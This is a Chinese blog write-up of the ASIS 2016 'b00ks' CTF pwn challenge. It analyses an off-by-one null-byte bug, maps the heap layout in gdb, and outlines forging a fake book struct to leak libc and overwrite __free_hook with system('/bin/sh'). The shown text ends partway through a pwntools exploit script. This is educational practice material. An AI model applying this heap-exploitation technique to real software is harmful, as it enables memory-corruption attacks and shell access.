<!DOCTYPE html>
<html lang="en-us" dir="ltr">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content='这道题是第一次通过一步步调试在本地打通，参考了很多大佬的WP，记录一下。 分析功能及数据结构 checksec之后可知是amd64的结构，放入I'><title>Asis_2016_b00ks</title>

<link rel='canonical' href='https://J-shiro.github.io/zh-cn/p/asis_2016_b00ks/'>

<link rel="stylesheet" href="/scss/style.min.60f827246f83cc44ebee82f18c268140d2b47484c0e30b531cfec086e0fd2f2b.css"><meta property='og:title' content='Asis_2016_b00ks'>
<meta property='og:description' content='这道题是第一次通过一步步调试在本地打通，参考了很多大佬的WP，记录一下。 分析功能及数据结构 checksec之后可知是amd64的结构，放入I'>
<meta property='og:url' content='https://J-shiro.github.io/zh-cn/p/asis_2016_b00ks/'>
<meta property='og:site_name' content='J-shiro&#39;s 博客'>
<meta property='og:type' content='article'><meta property='article:section' content='Post' /><meta property='article:published_time' content='2022-10-25T00:00:00&#43;00:00'/><meta property='article:modified_time' content='2022-10-25T00:00:00&#43;00:00'/>
<meta name="twitter:title" content="Asis_2016_b00ks">
<meta name="twitter:description" content="这道题是第一次通过一步步调试在本地打通，参考了很多大佬的WP，记录一下。 分析功能及数据结构 checksec之后可知是amd64的结构，放入I">
    <link rel="shortcut icon" href="https://j-shiro.github.io/img/somebody.png" />

    </head>
    <body class="
    article-page
    ">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.documentElement.dataset.scheme = 'dark';
        } else {
            document.documentElement.dataset.scheme = 'light';
        }
    })();
</script>
<div class="container main-container flex on-phone--column extended"><aside class="sidebar left-sidebar sticky ">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="切换菜单">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header>
        
            
            <figure class="site-avatar">
                <a href="/zh-cn">
                
                    
                    
                    
                        
                        <img src="/img/avatar_hu42aab1a06b48994d4eab55119e198264_548369_300x0_resize_box_3.png" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                
                </a>
                
                    <span class="emoji">🍥</span>
                
            </figure>
            
        
        
        <div class="site-meta">
            <h1 class="site-name"><a href="/zh-cn">J-shiro&#39;s 博客</a></h1>
            <h2 class="site-description">Welcome! I will record some of my own hobbies there.//欢迎来到我的博客！</h2>
        </div>
    </header><ol class="social-menu">
            
                <li>
                    <a 
                        href='https://github.com/CaiJimmy/hugo-theme-stack'
                        target="_blank"
                        title="GitHub"
                    >
                        
                        
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-brand-github" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M9 19c-4.3 1.4 -4.3 -2.5 -6 -3m12 5v-3.5c0 -1 .1 -1.4 -.5 -2c2.8 -.3 5.5 -1.4 5.5 -6a4.6 4.6 0 0 0 -1.3 -3.2a4.2 4.2 0 0 0 -.1 -3.2s-1.1 -.3 -3.5 1.3a12.3 12.3 0 0 0 -6.2 0c-2.4 -1.6 -3.5 -1.3 -3.5 -1.3a4.2 4.2 0 0 0 -.1 3.2a4.6 4.6 0 0 0 -1.3 3.2c0 4.6 2.7 5.7 5.5 6c-.6 .6 -.6 1.2 -.5 2v3.5" />
</svg>



                        
                    </a>
                </li>
            
                <li>
                    <a 
                        href='https://twitter.com'
                        target="_blank"
                        title="Twitter"
                    >
                        
                        
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-brand-twitter" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M22 4.01c-1 .49 -1.98 .689 -3 .99c-1.121 -1.265 -2.783 -1.335 -4.38 -.737s-2.643 2.06 -2.62 3.737v1c-3.245 .083 -6.135 -1.395 -8 -4c0 0 -4.182 7.433 4 11c-1.872 1.247 -3.739 2.088 -6 2c3.308 1.803 6.913 2.423 10.034 1.517c3.58 -1.04 6.522 -3.723 7.651 -7.742a13.84 13.84 0 0 0 .497 -3.753c-.002 -.249 1.51 -2.772 1.818 -4.013z" />
</svg>



                        
                    </a>
                </li>
            
        </ol><ol class="menu" id="main-menu">
        
        
        

        <li >
            <a href='/zh-cn/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>主页</span>
            </a>
        </li>
        
        

        <li >
            <a href='/zh-cn/%E5%85%B3%E4%BA%8E/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>关于</span>
            </a>
        </li>
        
        

        <li >
            <a href='/zh-cn/archives/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-archive" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <rect x="3" y="4" width="18" height="4" rx="2" />
  <path d="M5 8v10a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-10" />
  <line x1="10" y1="12" x2="14" y2="12" />
</svg>



                
                <span>档案</span>
            </a>
        </li>
        
        

        <li >
            <a href='/zh-cn/search/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-search" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="10" cy="10" r="7" />
  <line x1="21" y1="21" x2="15" y2="15" />
</svg>



                
                <span>搜索</span>
            </a>
        </li>
        
        

        <li >
            <a href='/zh-cn/%E9%93%BE%E6%8E%A5/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-link" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M10 14a3.5 3.5 0 0 0 5 0l4 -4a3.5 3.5 0 0 0 -5 -5l-.5 .5" />
  <path d="M14 10a3.5 3.5 0 0 0 -5 0l-4 4a3.5 3.5 0 0 0 5 5l.5 -.5" />
</svg>



                
                <span>链接</span>
            </a>
        </li>
        

        <div class="menu-bottom-section">
                <li id="i18n-switch">  
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-language" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M4 5h7" />
  <path d="M9 3v2c0 4.418 -2.239 8 -5 8" />
  <path d="M5 9c-.003 2.144 2.952 3.908 6.7 4" />
  <path d="M12 20l4 -9l4 9" />
  <path d="M19.1 18h-6.2" />
</svg>



                    <select name="language" onchange="window.location.href = this.selectedOptions[0].value">
                        
                            <option value="https://J-shiro.github.io/" >English</option>
                        
                            <option value="https://J-shiro.github.io/zh-cn/" selected>中文</option>
                        
                    </select>
                </li>
            
            
            
                <li id="dark-mode-toggle">
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                    <span>暗色模式</span>
                </li>
            
        </div>
    </ol>
</aside>
<main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/zh-cn/categories/pwn_exercise/" >
                pwn_exercise
            </a>
        
    </header>
    

    <div class="article-title-wrapper">
        <h2 class="article-title">
            <a href="/zh-cn/p/asis_2016_b00ks/">Asis_2016_b00ks</a>
        </h2>
    
        
    </div>

    
    <footer class="article-time">
        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-calendar-time" width="56" height="56" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M11.795 21h-6.795a2 2 0 0 1 -2 -2v-12a2 2 0 0 1 2 -2h12a2 2 0 0 1 2 2v4" />
  <circle cx="18" cy="18" r="4" />
  <path d="M15 3v4" />
  <path d="M7 3v4" />
  <path d="M3 11h16" />
  <path d="M18 16.496v1.504l1 1" />
</svg>
                <time class="article-time--published">Oct 25, 2022</time>
            </div>
        

        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



                <time class="article-time--reading">
                    阅读时长: 12 分钟
                </time>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



                <time class="article-words">
                    5706 字
                </time>
            </div>
        
    </footer>
    

    
</div>
</header>

    <section class="article-content">
    
    
    <p>这道题是第一次通过一步步调试在本地打通，参考了很多大佬的WP，记录一下。</p>
<h2 id="分析功能及数据结构">分析功能及数据结构</h2>
<p><img src="/img/b00ks/image-20221025152027671.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>checksec之后可知是amd64的结构，放入IDA64中分析，进入找到main函数按F5键查看伪代码。</p>
<h3 id="main">main</h3>
<p><img src="/img/b00ks/image-20221025152231748.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="sub_a77">sub_A77</h3>
<p>首先初始化stdout和stdin，sub_A77函数输出一行文字</p>
<p><img src="/img/b00ks/image-20221025152349337.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="sub_b6d">sub_B6D</h3>
<p>sub_B6D函数需要输入作者名称，将读入名字author_name，其中<code>32LL</code>为0x20的长度，还需要进一步看sub_9F5函数。</p>
<p><img src="/img/b00ks/image-20221025152439174.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>sub_B6D函数最后效果为将name读入到0x02040位置。</p>
<p><img src="/img/b00ks/image-20221025154415885.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="sub_9f5">sub_9F5</h3>
<p>sub_9F5函数首先需要输入的a2大于0，即长度大于0，在for循环中i从0开始计数，一步一步读入输入的字符，其中，read()函数的返回值为实际读到的字节数，若每次读到的字节数不为1则退出返回1，然后在sub_B60函数中报错读入失败，若此时写向buf的值为10，退出循环，每次循环中，<code>++buf</code>buf自增。在该处为循环了32次，当i与a2相等后，跳出循环，buf所指向的位置会赋值为0</p>
<p><img src="/img/b00ks/image-20221025152645662.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="sub_a89">sub_A89</h3>
<p><strong>sub_9F5即为漏洞函数</strong>，存在off by one漏洞，当输入数据长度正好为a2时，会向buf中越界写入一个字节<code>'\x00'</code>，假设a2为32，则通过read读取32个字符后，在++buf后，让第33个字符的位置被<code>'\x00'</code>覆盖。</p>
<p>接着进入while语句条件中的sub_A89函数，效果为打印出菜单并且只允许输入1到6的数字。</p>
<p><img src="/img/b00ks/image-20221025154600040.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>进入while循环是switch语句分支为6种不同的情况，包括创建图书结构(sub_F55)、删除图书结构(sub_BBD)、编辑书本描述(sub_E17)、展示图书(sub_D1F)、重新编辑作者名字(sub_B6D)、错误选择。</p>
<h3 id="sub_f55">sub_F55</h3>
<p>该函数主要用于创建书本的结构，首先输入书本名字大小到v2，若v2大于等于0则malloc会分配name buffer(≤32)，若分配成功，ptr指向分配的空间，继续通过sub_9F5读入名字到ptr指向的地址，失败则输出“fail to read name&quot;，成功则进入else；</p>
<p>else中v2赋值为0，scanf输入书本描述的大小给v2，此时malloc再一次分配description buffer，此处的大小自定义，v6指向分配的空间，若成功，则继续输入书本的描述，此时v0赋值为v6，sub_9F5读入，成功读入后则进入else；</p>
<p><img src="/img/b00ks/image-20221025155340205.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="sub_b24">sub_B24</h3>
<p>sub_B24函数主要在off_202010到之后的共20的位置查看是否有值，若为0，则说明有空闲位置，返回空闲的位置所代表的i。</p>
<p><img src="/img/b00ks/image-20221025160305683.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>所以此时v3为返回的那个i值，若v3不为-1，则进入else即创建结构体操作；</p>
<p>首先malloc分配book结构体用于保存book的信息，v4指向该空间，若分配成功，则有</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="o">*</span><span class="p">((</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v4</span> <span class="o">+</span> <span class="mi">6</span><span class="p">)</span> <span class="o">=</span> <span class="n">v2</span><span class="p">;</span><span class="c1">//description size -&gt;6个Dword, 6x(2x1)x2 = 24字节
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="o">*</span><span class="p">((</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">off_202010</span> <span class="o">+</span> <span class="n">v3</span><span class="p">)</span> <span class="o">=</span> <span class="n">v4</span><span class="p">;</span><span class="c1">//book
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="o">*</span><span class="p">((</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v4</span> <span class="o">+</span> <span class="mi">2</span><span class="p">)</span> <span class="o">=</span> <span class="n">v6</span><span class="p">;</span><span class="c1">//description -&gt; 2x(4x1)x2 = 16字节
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="o">*</span><span class="p">((</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v4</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">=</span> <span class="n">ptr</span><span class="p">;</span><span class="c1">//name -&gt; 1x(4x1)x2 = 8字节
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v4</span> <span class="o">=</span> <span class="o">++</span><span class="n">unk_202024</span><span class="p">;</span><span class="c1">//每本书的ID -&gt; 0字节
</span></span></span></code></pre></td></tr></table>
</div>
</div><p>该处五行代码：v2是description size存放在v4偏移6个dword位置，v3为返回的i值，此处是将指向书本结构的v4存放在off_202010偏移i的位置，v6是description存放在v4偏移2个qword位置，ptr是name存放在v4偏移1个qword的位置。</p>
<p><strong>补充：结构体内存布局对齐</strong></p>
<p>64位程序，机器字长8个字节，id是int型数据，存入堆中只存了4个字节，而接下来存的name是一个指针型数据，64位系统中为8字节，所以将其放入后面新的8字节中，int后空出来的4字节空白补齐，此时共16字节。</p>
<p><strong>补充：强制类型转化</strong><code>*(_DWORD *)</code>:</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="n">v3</span> <span class="o">+=</span> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)(</span><span class="mi">4LL</span><span class="o">*</span><span class="n">i</span><span class="o">+</span><span class="n">a1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="c1">//从a1[4LL*i]开始按DWORD格式取出4字节
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">a1</span><span class="o">+</span><span class="mi">15</span><span class="p">)</span> <span class="o">=</span> <span class="mi">12</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="c1">//将a1的值加上15，然后将这个值强制转换为整数指针，并往这个指针指向的地址内存写入一个“12”的整数
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>
</span></span><span class="line"><span class="cl"><span class="c1">//DWORD：unsigned long无符号的
</span></span></span></code></pre></td></tr></table>
</div>
</div><p><img src="/img/b00ks/image-20221025155403683.png"
	
	
	
	loading="lazy"
	
	
></p>
<p><img src="/img/b00ks/image-20221025155423752.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="sub_bbd">sub_BBD</h3>
<p>输入要删除的id，然后进行free并且赋值为0。</p>
<p><img src="/img/b00ks/image-20221025161124844.png"
	
	
	
	loading="lazy"
	
	
></p>
<h3 id="sub_e17">sub_E17</h3>
<p><img src="/img/b00ks/image-20221025161226153.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>编辑book description</p>
<h3 id="sub_d1f">sub_D1F</h3>
<p>该函数用于展示书本book，打印id、name、description、author。从off_202010所指向的那一些地址读出数据。</p>
<p><img src="/img/b00ks/image-20221025161344963.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>通过此处的分析以及创建书本结构体的函数，我们可以得出书籍的结构体</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">book_struct</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="kt">int</span> <span class="n">book_id</span><span class="p">;</span>	            <span class="c1">//offset:0
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>	<span class="kt">char</span><span class="o">*</span> <span class="n">book_name</span><span class="p">;</span>		<span class="c1">//offset:8 malloc(size)
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>	<span class="kt">char</span><span class="o">*</span> <span class="n">book_description</span><span class="p">;</span>     <span class="c1">//offset:16 malloc(size)
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>	<span class="kt">int</span> <span class="n">book_description_size</span><span class="p">;</span>  <span class="c1">//offset:24
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>共20字节：</p>
<p><strong>0-4字节</strong>：book_id，是一堆大于0的数字，第1,2,3,4,5本书</p>
<p><strong>0x08-0x10字节</strong>：放book_name的指针，指针里放着书的名字（字符）</p>
<p><strong>0x10-0x18字节</strong>：放book_description的指针，指针里放着书的描述（字符）</p>
<p><strong>0x18-0x1c字节</strong>：放着description的字符串的额最大长度，意为：若再次修改它，最多能输入多少字符</p>
<h3 id="sub_b6d-1">sub_B6D</h3>
<p>通过sub_9F5重新编辑author name</p>
<p><img src="/img/b00ks/image-20221025161745008.png"
	
	
	
	loading="lazy"
	
	
></p>
<h2 id="off-by-one">Off by one</h2>
<p><strong>off-by-one：指程序向缓冲区写入字节数超过了缓冲区本身的大小，并且只越界了一个字节，与边界验证不严或字符串操作有关</strong></p>
<ul>
<li>循环语句向缓冲区写入数据，循环次数设置错误导致多写了一个字节</li>
<li>字符串操作不合适，如忽略了字符串末尾的<code>'\x00'</code></li>
</ul>
<p>bss中放结构，用off by null来做堆布局，堆布局使得book结构体落在可控制的堆上，结合“查”、“改”可任意地址读写，off-by-one可以基于各种缓冲区：栈、bss、堆等等。</p>
<h2 id="实践exp">实践exp</h2>
<p>此处使用gdb插件peda会更加方便，之前使用的是pwngdb，但是对于查找某个字符peda会使用更方便。切换gdb插件：更改<code>~/.gdbinit</code>文件，将pwngdb注释掉，取消peda的注释即可。</p>
<p><img src="/img/b00ks/image-20221025164051973.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>其中将off_202010：global_book_struct_array，off_202018：author_name_ptr，两者指向的地址之间正好相差为32个字节(0x20)，当输入author_name长度为32时，会向author_name_ptr中越界写入一个字节<code>\x00</code>，之后创建book_struct时会将其地址保存在global_book_struct_array中，覆盖之前字符串截断符<code>\x00</code>，所以可以打印出author_name实现信息泄露。（越界写入一个字节会覆盖global_book_struct_array中的保存的第一个book_struct的地址。</p>
<h3 id="peda的find插件进行分析">peda的find插件进行分析</h3>
<p>gdb运行程序，进入run，输入作者名字：aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabc(32)，选择1，10，aaaaa，10，bbbbb，ctrl+C</p>
<p><img src="/img/b00ks/image-20221025164827903.png"
	
	
	
	loading="lazy"
	
	
></p>
<p><img src="/img/b00ks/image-20221025164901716.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>输入find aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabc找到相应的位置</p>
<p><img src="/img/b00ks/image-20221025164948519.png"
	
	
	
	loading="lazy"
	
	
></p>
<p><img src="/img/b00ks/image-20221025165159813.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>此处0x555555602040和0x555555602050存放着author_name，（a=61,b=62,c=63)，之后的0x555555602040指向的地址为book指针，查看book指针，可以发现book的结构体</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">0x5555556036f0:	0x0000000000000001 ID				0x00005555556036b0 book name
</span></span><span class="line"><span class="cl">0x555555603700:	0x00005555556036d0 description		0x000000000000000a description size
</span></span><span class="line"><span class="cl">0x555555603710:	0x0000000000000000					0x00000000000208f1 top chunk
</span></span><span class="line"><span class="cl">0x555555603720:	0x0000000000000000					0x0000000000000000
</span></span><span class="line"><span class="cl">0x555555603730:	0x0000000000000000					0x0000000000000000
</span></span></code></pre></td></tr></table>
</div>
</div><p><strong>其中可以发现，将f0改变为00后，book1指针指向description</strong></p>
<p>继续查看book_name和description可以看到aaaaa和bbbbb</p>
<p><img src="/img/b00ks/image-20221025165920156.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>创建两个book：</p>
<p><img src="/img/b00ks/image-20221025170206730.png"
	
	
	
	loading="lazy"
	
	
></p>
<p><img src="/img/b00ks/image-20221025170553060.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>可以看到大致的书本结构以及第二本书的结构。</p>
<h3 id="利用技巧与思路">利用技巧与思路</h3>
<ul>
<li><strong>edit author_name的函数使得</strong>：可将book1地址最后一个字节修改为00，且当create book后，book1的地址会将33位的NULL字节覆盖，打印author_name可得到book1的地址。</li>
</ul>
<ol>
<li><strong>设置author_name长度为32,33位的<code>\x00</code>被book1地址覆写后，输出author_name即可泄露book1的地址</strong></li>
<li><strong>通过修改author_name，使得后两位变为00，布置使得book1指针指向book1的description</strong></li>
<li><strong>修改book1的description，使得description内容为fake_book1</strong></li>
<li><strong>fake_book1中的book_name和description指针，指针指向book2的description</strong></li>
<li><strong>输出book1，则book1的description即为fake_book1，可打印出book2的description的地址，实现泄露，得到libc_base</strong></li>
<li><strong>将book2的description设置为<code>__free_hook</code>函数，将book2的name设置为<code>system(&quot;/bin/sh&quot;)</code>函数，再free book2，调用<code>__free_hook</code>，执行<code>system(&quot;/bin/sh&quot;)</code></strong></li>
</ol>
<h3 id="基本函数定义">基本函数定义</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span><span class="lnt">47
</span><span class="lnt">48
</span><span class="lnt">49
</span><span class="lnt">50
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
</span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span><span class="o">=</span><span class="s2">&#34;debug&#34;</span>
</span></span><span class="line"><span class="cl"><span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./b00ks&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="c1">#libc = ELF(&#34;libc-2.27.so&#34;)</span>
</span></span><span class="line"><span class="cl"><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;/lib/x86_64-linux-gnu/libc.so.6&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">createbook</span><span class="p">(</span><span class="n">name_size</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">des_size</span><span class="p">,</span> <span class="n">des</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;&gt; &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;1&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">name_size</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">name</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
